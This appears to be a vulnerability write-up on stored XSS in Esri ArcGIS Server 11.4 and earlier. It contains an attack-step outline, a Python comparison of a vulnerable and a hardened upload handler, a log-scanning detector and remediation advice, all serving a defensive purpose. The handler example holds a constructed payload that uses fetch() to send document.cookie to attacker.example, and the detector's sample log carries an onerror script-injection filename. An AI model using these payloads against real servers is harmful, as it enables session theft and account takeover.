Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to a stored cross-site scripting (XSS) attack in which an unauthenticated attacker can place files containing script on the server. When another user's browser loads such a file from the ArcGIS Server origin, the script runs in that user's session, which can lead to session and data theft, account takeover, and follow-on actions performed with the victim's privileges. Exploitation depends on specific server configurations (the advisory does not spell out which), and the impact falls on organizations that rely on ArcGIS Server for geospatial data management.
Step 1: Payload Creation: The attacker crafts a file that a browser will interpret as active content (for example an HTML file, or any file whose bytes begin with HTML markup) containing JavaScript designed to steal session cookies or tokens, redirect the user, or issue requests to the server on the victim's behalf.
Step 2: File Upload: In an affected configuration, the attacker submits the file through an upload path that accepts it without authentication and without checking that its type or content is what the feature expects.
Step 3: File Storage: ArcGIS Server stores the uploaded file and makes it retrievable from its own origin, so it can later be requested by other users.
Step 4: Victim Interaction: A legitimate user follows a link to, or opens a page that references, the attacker's stored file, for example through a map, a data view, or another ArcGIS Server feature. Because the file is served from the ArcGIS Server origin, the browser renders it with that origin's cookies and storage.
Step 5: Payload Execution: The victim's browser executes the JavaScript in the stored file, giving the attacker the victim's session on the ArcGIS Server site and the ability to act as that user.
The vulnerability stems from insufficient validation of user-supplied files and of how they are served back. The affected upload path does not restrict file types or inspect content, so a file whose body is HTML or script is accepted and persisted. When that file is later retrieved from the ArcGIS Server origin without the protections that prevent a browser from treating it as a page (a correct Content-Type derived from an allow list, X-Content-Type-Options: nosniff, and a Content-Disposition that forces download rather than inline rendering), the embedded JavaScript executes in the victim's browser with the victim's session. The root cause is therefore the combination of unvalidated storage and unsafe delivery of attacker-controlled file content, not a single missing escape on a rendered string.
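To make the store-and-serve failure concrete, the following added example (written for this page, not ArcGIS Server code) shows a generic vulnerable upload handler next to a hardened one. The payload, the allow list, the magic-byte table and every function name are constructed for the illustration; they describe the bug class, not Esri's implementation.

```python
"""Stored XSS through a file-upload feature: a generic vulnerable
store-and-serve pattern next to a hardened one. Added illustration of the
bug class, not ArcGIS Server code; every name, header set and the payload
below are constructed for this example."""
import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed attacker payload: a "legend" file that is really an HTML document.
XSS_PAYLOAD = (b"<html><script>fetch('https://attacker.example/?c='"
               b"+encodeURIComponent(document.cookie))</script></html>")

# Markup a browser treats as active content when it renders a file as HTML.
ACTIVE_MARKERS = re.compile(
    rb"<\s*(script|iframe|svg|object|embed|html|body|meta)\b|\bon\w+\s*=|javascript:",
    re.IGNORECASE)


@dataclass
class StoredFile:
    name: str
    content_type: str
    data: bytes


@dataclass
class Response:
    status: int
    headers: dict = field(default_factory=dict)
    body: bytes = b""


# Vulnerable pattern: trust the client's filename and Content-Type, keep the
# bytes verbatim, and serve them inline from the application's own origin.
def vulnerable_store(name: str, client_content_type: str, data: bytes) -> StoredFile:
    return StoredFile(name, client_content_type, data)


def vulnerable_serve(f: StoredFile) -> Response:
    # text/html from the app origin: the script runs with the victim's session.
    return Response(200, {"Content-Type": f.content_type}, f.data)


# Hardened pattern: allow-list the type, verify the magic bytes, refuse active
# markup, rename on the server, and serve as a download with sniffing disabled.
ALLOWED = {".png": "image/png", ".jpg": "image/jpeg", ".zip": "application/zip"}
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".zip": b"PK\x03\x04"}


def check_upload(name: str, data: bytes) -> Optional[str]:
    """Return a rejection reason, or None when the upload is acceptable."""
    ext = ("." + name.rsplit(".", 1)[-1].lower()) if "." in name else ""
    if ext not in ALLOWED:
        return f"extension {ext or '(none)'} not allowed"
    if not data.startswith(MAGIC[ext]):
        return f"content does not match {ALLOWED[ext]} magic bytes"
    # Defence in depth against polyglots (valid image header, HTML tail).
    if ACTIVE_MARKERS.search(data):
        return "active content markers found in upload"
    return None


def hardened_store(name: str, client_content_type: str, data: bytes) -> StoredFile:
    # client_content_type is deliberately ignored: the type comes from the allow list.
    reason = check_upload(name, data)
    if reason is not None:
        raise ValueError(reason)
    ext = "." + name.rsplit(".", 1)[-1].lower()
    # Server-generated name: nothing attacker-controlled reaches the URL or the disk.
    safe_name = hashlib.sha256(data).hexdigest()[:16] + ext
    return StoredFile(safe_name, ALLOWED[ext], data)


def hardened_serve(f: StoredFile) -> Response:
    headers = {
        "Content-Type": f.content_type,
        # Browsers must not second-guess the declared type (no HTML sniffing).
        "X-Content-Type-Options": "nosniff",
        # Download, never render inline; the server-generated name is ASCII-safe.
        "Content-Disposition": f'attachment; filename="{f.name}"',
        # Even if something renders it, it gets no script and an opaque origin.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    return Response(200, headers, f.data)
```

The strongest additional control is not shown in code: serve user uploads from a separate origin (a dedicated download host) so that a file which slips through the checks still cannot read the application's cookies or storage. Note that the marker check is a heuristic; the allow list, magic-byte check and download-only delivery are the controls that actually close the class.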
No specific threat actor is linked to this issue at the time of writing; any actor targeting geospatial data or organizations that run ArcGIS Server, whether for espionage, data theft, or disruption, could make use of it. The advisory does not cite a CISA KEV listing; check the catalog before using KEV status to prioritise remediation.
Monitor web server logs for unusual uploads, especially files with HTML, JavaScript, SVG, or XML extensions, or filenames that contain markup, and for bursts of uploads from a single source.
Analyze HTTP traffic for stored upload items being served with a renderable content type (text/html, image/svg+xml, application/xhtml+xml) or without Content-Disposition: attachment and X-Content-Type-Options: nosniff.
Implement a Web Application Firewall (WAF) to detect and block XSS attempts in upload requests.
Monitor file system activity for newly created files in unexpected locations, particularly under directories the web tier serves.
Where you maintain custom server extensions or web applications in front of ArcGIS Server, review their upload and download handlers for missing type validation and unsafe response headers.
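The log-based checks above can be run as a script. The following added example (not Esri tooling) scans Combined Log Format access-log lines for the upload-then-serve pattern: uploads whose filename carries an active-content extension or embedded markup, stored items later fetched under a renderable name, and upload bursts from one source. The sample lines, the "/upload" path convention, the filename query parameter and the burst threshold are all constructed assumptions for the example; real access logs usually do not carry the multipart filename, so in practice this is correlated with the application's own upload log.

```python
"""Detection pass over web-server access logs for the upload-then-serve
pattern behind a stored XSS. Added example, not Esri tooling: the log lines
below are constructed, and the /upload path convention, the filename query
parameter and the burst threshold are assumptions, not documented
ArcGIS Server behaviour."""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)')

# Extensions a browser may render as active content.
RISKY_EXT = {".html", ".htm", ".shtml", ".xhtml", ".svg", ".js", ".xml", ".hta", ".mht"}
UPLOAD_HINT = re.compile(r"/upload", re.IGNORECASE)
UPLOAD_BURST = 3  # assumed threshold: uploads from one IP before we report a burst

# Constructed sample log (Combined Log Format). 203.0.113.7 is the attacker,
# 198.51.100.20 is a legitimate analyst who later opens the stored file.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2025:14:02:11 +0000] "POST /arcgis/rest/services/Parcels/MapServer/uploads/upload?f=json HTTP/1.1" 200 312 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2025:14:02:12 +0000] "POST /arcgis/rest/services/Parcels/MapServer/uploads/upload?f=json&filename=legend.html HTTP/1.1" 200 312 "-" "python-requests/2.31"
198.51.100.20 - analyst [10/Mar/2025:14:05:40 +0000] "GET /arcgis/rest/services/Parcels/MapServer/uploads/8f3a1c/legend.html HTTP/1.1" 200 1402 "-" "Mozilla/5.0"
198.51.100.20 - analyst [10/Mar/2025:14:05:41 +0000] "GET /arcgis/rest/services/Parcels/MapServer/export?bbox=1,2,3,4&f=image HTTP/1.1" 200 84211 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2025:14:06:02 +0000] "POST /arcgis/rest/services/Parcels/MapServer/uploads/upload?f=json&filename=%3Cimg%20src=x%20onerror=alert(1)%3E.png HTTP/1.1" 200 312 "-" "python-requests/2.31"
"""


def risky_names(target: str) -> list:
    """Filenames in the path or query with a risky extension or embedded markup."""
    parts = urlsplit(target)
    candidates = [unquote(parts.path.rsplit("/", 1)[-1])]
    for values in parse_qs(parts.query).values():
        candidates.extend(values)  # parse_qs already percent-decodes
    hits = []
    for c in candidates:
        ext = ("." + c.rsplit(".", 1)[-1].lower()) if "." in c else ""
        if ext in RISKY_EXT or re.search(r"<|>|javascript:", c, re.IGNORECASE):
            hits.append(c)
    return hits


def analyze(log_text: str) -> list:
    """Return findings as dicts with ip, reason, names and the offending line."""
    findings = []
    uploads_per_ip = Counter()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line we understand
        rec = m.groupdict()
        touches_upload = bool(UPLOAD_HINT.search(rec["target"]))
        is_upload = rec["method"] in ("POST", "PUT") and touches_upload
        if is_upload:
            uploads_per_ip[rec["ip"]] += 1
        names = risky_names(rec["target"])
        if is_upload and names:
            findings.append({"ip": rec["ip"], "reason": "upload of active-content filename",
                             "names": names, "line": line})
        elif rec["method"] == "GET" and touches_upload and names and rec["status"] == "200":
            findings.append({"ip": rec["ip"], "reason": "stored upload served as active content",
                             "names": names, "line": line})
    for ip, n in uploads_per_ip.items():
        if n >= UPLOAD_BURST:
            findings.append({"ip": ip, "reason": f"{n} uploads from one source",
                             "names": [], "line": ""})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_LOG):
        print(f"{f['ip']:15} {f['reason']}: {f['names']}")
```

The GET finding is the one worth paging on: it is evidence that an active-content file was actually delivered to a user, not just uploaded. Run the same logic over the reverse proxy or load balancer logs if ArcGIS Server sits behind one, since that is where the victim's requests are recorded.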
Upgrade to ArcGIS Server 11.5 or later; 11.4 and earlier are affected.
Validate uploads on the server: allow-list permitted file types, check file content against the claimed type, and ignore client-supplied file names and Content-Type values. Serve stored uploads with a correct Content-Type, X-Content-Type-Options: nosniff, and Content-Disposition: attachment, ideally from a separate origin so they cannot reach the application's session.
Configure ArcGIS Server to restrict which upload operations are exposed, and to which users, along with the permitted file types and sizes.
Regularly scan the server for malicious files.
Implement a Web Application Firewall (WAF) to filter malicious requests.
Review and harden server configurations to minimize attack surface.
Apply the principle of least privilege to user accounts and server processes.